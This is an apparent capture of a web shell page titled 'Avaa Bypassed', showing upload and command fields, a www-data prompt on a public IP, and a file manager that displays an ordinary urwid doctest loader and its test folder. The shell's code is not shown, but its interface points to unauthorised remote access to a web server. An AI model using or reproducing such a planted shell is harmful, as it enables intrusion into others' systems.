[ Avaa Bypassed ]




Upload:

Command:

www-data@3.144.165.218: ~ $
import unittest
import doctest

import urwid
import urwid.numedit

def load_tests(loader, tests, ignore):
    module_doctests = [
        urwid.widget,
        urwid.wimp,
        urwid.decoration,
        urwid.display_common,
        urwid.main_loop,
        urwid.numedit,
        urwid.monitored_list,
        urwid.raw_display,
        'urwid.split_repr', # override function with same name
        urwid.util,
        urwid.signals,
        urwid.graphics,
        ]
    for m in module_doctests:
        tests.addTests(doctest.DocTestSuite(m,
            optionflags=doctest.ELLIPSIS | doctest.IGNORE_EXCEPTION_DETAIL))
    return tests

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 0 B 0644
test_canvas.py File 15.82 KB 0644
test_container.py File 27.27 KB 0644
test_decoration.py File 6.7 KB 0644
test_doctests.py File 644 B 0644
test_escapes.py File 2.88 KB 0644
test_event_loops.py File 7 KB 0644
test_graphics.py File 4.15 KB 0644
test_listbox.py File 27.37 KB 0644
test_str_util.py File 1.23 KB 0644
test_text_layout.py File 10.39 KB 0644
test_util.py File 7.67 KB 0644
test_widget.py File 5.25 KB 0644
util.py File 149 B 0644